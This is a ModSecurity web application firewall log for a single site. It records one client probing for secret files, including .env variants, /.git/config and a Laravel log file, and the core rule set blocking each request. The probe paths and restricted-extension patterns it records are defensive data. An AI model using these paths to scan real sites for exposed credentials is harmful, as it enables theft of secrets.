[Mon May 11 18:54:42.044050 2026] [security2:error] [pid 1424905:tid 1424917] [client 5.255.123.95:34712] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/403.shtml"] [unique_id "agIJ0oW8yzYoWG_eyCXI5AAAAUk"]
[Mon May 11 18:54:42.044072 2026] [security2:error] [pid 1412074:tid 1412096] [client 5.255.123.95:34702] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.backup"] [unique_id "agIJ0jJnyuKVXoStDhbrsgAAAFQ"]
[Mon May 11 18:54:42.044468 2026] [security2:error] [pid 1412074:tid 1412096] [client 5.255.123.95:34702] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.backup"] [unique_id "agIJ0jJnyuKVXoStDhbrsgAAAFQ"]
[Mon May 11 18:54:42.044620 2026] [security2:error] [pid 1411201:tid 1411269] [client 5.255.123.95:34768] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/403.shtml"] [unique_id "agIJ0vy_GXSWIKeli0sn3wAAAJg"]
[Mon May 11 18:54:42.044643 2026] [security2:error] [pid 1412074:tid 1412088] [client 5.255.123.95:34754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/admin/.env"] [unique_id "agIJ0jJnyuKVXoStDhbrswAAAEw"]
[Mon May 11 18:54:42.044815 2026] [security2:error] [pid 1424905:tid 1424929] [client 5.255.123.95:34692] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.local"] [unique_id "agIJ0oW8yzYoWG_eyCXI5gAAAVU"]
[Mon May 11 18:54:42.044826 2026] [security2:error] [pid 1412074:tid 1412088] [client 5.255.123.95:34754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/admin/.env"] [unique_id "agIJ0jJnyuKVXoStDhbrswAAAEw"]
[Mon May 11 18:54:42.044900 2026] [security2:error] [pid 1411201:tid 1411257] [client 5.255.123.95:34710] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.bak"] [unique_id "agIJ0vy_GXSWIKeli0sn4AAAAIs"]
[Mon May 11 18:54:42.045059 2026] [security2:error] [pid 1411201:tid 1411257] [client 5.255.123.95:34710] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.bak"] [unique_id "agIJ0vy_GXSWIKeli0sn4AAAAIs"]
[Mon May 11 18:54:42.045071 2026] [security2:error] [pid 1416109:tid 1416150] [client 5.255.123.95:34750] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/api/.env"] [unique_id "agIJ0lV4kyjgo4bQBUiIqAAAANQ"]
[Mon May 11 18:54:42.045251 2026] [security2:error] [pid 1416109:tid 1416150] [client 5.255.123.95:34750] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/api/.env"] [unique_id "agIJ0lV4kyjgo4bQBUiIqAAAANQ"]
[Mon May 11 18:54:42.045635 2026] [security2:error] [pid 1416109:tid 1416147] [client 5.255.123.95:34766] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/403.shtml"] [unique_id "agIJ0lV4kyjgo4bQBUiIpgAAANE"]
[Mon May 11 18:54:42.045741 2026] [security2:error] [pid 1424905:tid 1424912] [client 5.255.123.95:34784] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/public/.env"] [unique_id "agIJ0oW8yzYoWG_eyCXI5wAAAUQ"]
[Mon May 11 18:54:42.045896 2026] [security2:error] [pid 1424905:tid 1424912] [client 5.255.123.95:34784] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/public/.env"] [unique_id "agIJ0oW8yzYoWG_eyCXI5wAAAUQ"]
[Mon May 11 18:54:42.046584 2026] [security2:error] [pid 1424905:tid 1424929] [client 5.255.123.95:34692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.local"] [unique_id "agIJ0oW8yzYoWG_eyCXI5gAAAVU"]
[Mon May 11 18:54:42.046880 2026] [security2:error] [pid 1424905:tid 1424912] [client 5.255.123.95:34784] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/403.shtml"] [unique_id "agIJ0oW8yzYoWG_eyCXI5wAAAUQ"]
[Mon May 11 18:54:42.046880 2026] [security2:error] [pid 1416109:tid 1416149] [client 5.255.123.95:34730] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/403.shtml"] [unique_id "agIJ0lV4kyjgo4bQBUiIpwAAANM"]
[Mon May 11 18:54:42.046965 2026] [security2:error] [pid 1412074:tid 1412096] [client 5.255.123.95:34702] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/403.shtml"] [unique_id "agIJ0jJnyuKVXoStDhbrsgAAAFQ"]
[Mon May 11 18:54:42.047021 2026] [security2:error] [pid 1416109:tid 1416150] [client 5.255.123.95:34750] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/403.shtml"] [unique_id "agIJ0lV4kyjgo4bQBUiIqAAAANQ"]
[Mon May 11 18:54:42.047340 2026] [security2:error] [pid 1411201:tid 1411257] [client 5.255.123.95:34710] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/403.shtml"] [unique_id "agIJ0vy_GXSWIKeli0sn4AAAAIs"]
[Mon May 11 18:54:42.046749 2026] [security2:error] [pid 1412074:tid 1412095] [client 5.255.123.95:34694] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.development"] [unique_id "agIJ0jJnyuKVXoStDhbrtQAAAFM"]
[Mon May 11 18:54:42.047551 2026] [security2:error] [pid 1424905:tid 1424929] [client 5.255.123.95:34692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/403.shtml"] [unique_id "agIJ0oW8yzYoWG_eyCXI5gAAAVU"]
[Mon May 11 18:54:42.047785 2026] [security2:error] [pid 1416109:tid 1416144] [client 5.255.123.95:34722] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.staging"] [unique_id "agIJ0lV4kyjgo4bQBUiIrAAAAM4"]
[Mon May 11 18:54:42.047970 2026] [security2:error] [pid 1416109:tid 1416144] [client 5.255.123.95:34722] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.staging"] [unique_id "agIJ0lV4kyjgo4bQBUiIrAAAAM4"]
[Mon May 11 18:54:42.047845 2026] [security2:error] [pid 1424905:tid 1424911] [client 5.255.123.95:34678] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.production"] [unique_id "agIJ0oW8yzYoWG_eyCXI6AAAAUM"]
[Mon May 11 18:54:42.048103 2026] [security2:error] [pid 1412074:tid 1412095] [client 5.255.123.95:34694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.development"] [unique_id "agIJ0jJnyuKVXoStDhbrtQAAAFM"]
[Mon May 11 18:54:42.048598 2026] [security2:error] [pid 1424905:tid 1424911] [client 5.255.123.95:34678] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.production"] [unique_id "agIJ0oW8yzYoWG_eyCXI6AAAAUM"]
[Mon May 11 18:54:42.049289 2026] [security2:error] [pid 1412074:tid 1412095] [client 5.255.123.95:34694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/403.shtml"] [unique_id "agIJ0jJnyuKVXoStDhbrtQAAAFM"]
[Mon May 11 18:54:42.049373 2026] [security2:error] [pid 1416109:tid 1416144] [client 5.255.123.95:34722] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/403.shtml"] [unique_id "agIJ0lV4kyjgo4bQBUiIrAAAAM4"]
[Mon May 11 18:54:42.049543 2026] [security2:error] [pid 1412074:tid 1412088] [client 5.255.123.95:34754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/403.shtml"] [unique_id "agIJ0jJnyuKVXoStDhbrswAAAEw"]
[Mon May 11 18:54:42.049847 2026] [security2:error] [pid 1412074:tid 1412090] [client 5.255.123.95:34602] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "jeanboyault.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agIJ0jJnyuKVXoStDhbrtwAAAE4"]
[Mon May 11 18:54:42.049905 2026] [security2:error] [pid 1424905:tid 1424911] [client 5.255.123.95:34678] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/403.shtml"] [unique_id "agIJ0oW8yzYoWG_eyCXI6AAAAUM"]
[Mon May 11 18:54:42.050194 2026] [security2:error] [pid 1412074:tid 1412090] [client 5.255.123.95:34602] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agIJ0jJnyuKVXoStDhbrtwAAAE4"]
[Mon May 11 18:54:42.051065 2026] [security2:error] [pid 1412074:tid 1412090] [client 5.255.123.95:34602] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/403.shtml"] [unique_id "agIJ0jJnyuKVXoStDhbrtwAAAE4"]
[Mon May 11 18:54:42.058826 2026] [security2:error] [pid 1416109:tid 1416152] [client 5.255.123.95:34656] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env"] [unique_id "agIJ0lV4kyjgo4bQBUiIrgAAANY"]
[Mon May 11 18:54:42.059016 2026] [security2:error] [pid 1416109:tid 1416152] [client 5.255.123.95:34656] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env"] [unique_id "agIJ0lV4kyjgo4bQBUiIrgAAANY"]
[Mon May 11 18:54:42.059759 2026] [security2:error] [pid 1424905:tid 1424915] [client 5.255.123.95:34666] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.example"] [unique_id "agIJ0oW8yzYoWG_eyCXI6gAAAUc"]
[Mon May 11 18:54:42.059779 2026] [security2:error] [pid 1412074:tid 1412081] [client 5.255.123.95:34582] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/config"] [unique_id "agIJ0jJnyuKVXoStDhbruAAAAEU"]
[Mon May 11 18:54:42.059929 2026] [security2:error] [pid 1412074:tid 1412081] [client 5.255.123.95:34582] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/config"] [unique_id "agIJ0jJnyuKVXoStDhbruAAAAEU"]
